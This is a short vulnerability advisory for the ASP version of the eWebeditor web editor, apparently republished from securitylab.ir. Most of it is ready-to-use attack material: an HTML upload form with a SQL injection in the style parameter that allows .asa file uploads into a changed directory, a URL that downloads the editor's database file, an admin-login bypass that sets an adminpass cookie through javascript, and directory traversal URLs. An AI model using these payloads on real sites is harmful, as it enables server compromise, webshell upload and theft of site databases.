SecurityvulnsSECURITYVULNS:DOC:23168eWebeditor ASP Version Multiple Vulnerabilities
#################################################################
Securitylab.ir
#################################################################
Application Info:
Name: eWebeditor
Version: ASP
#################################################################
Vulnerability:
=======================
Arbitrary File Upload
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' /
… / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize,
S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype ="
multipart / form-data ">
<p align="center">
<input type=file name=uploadfile size=100><br> <br>
<input type=submit value=Upload> </p>
</form>
=======================
Arbitrary File Upload 2
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
=======================
Database Disclosure
http://site.com/ewebeditor/db/ewebeditor.mdb
=======================
Administrator bypass
http://site.com/eWebEditor/admin/login.asp
put this code instead URL
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
=======================
Directory Traversal
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./…
=======================
Directory Traversal 2
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./…
#################################################################
Discoverd By: Pouya Daneshmand
Website: http://securitylab.ir
Contacts: info[at]securitylab.ir & [email protected]
###################################################################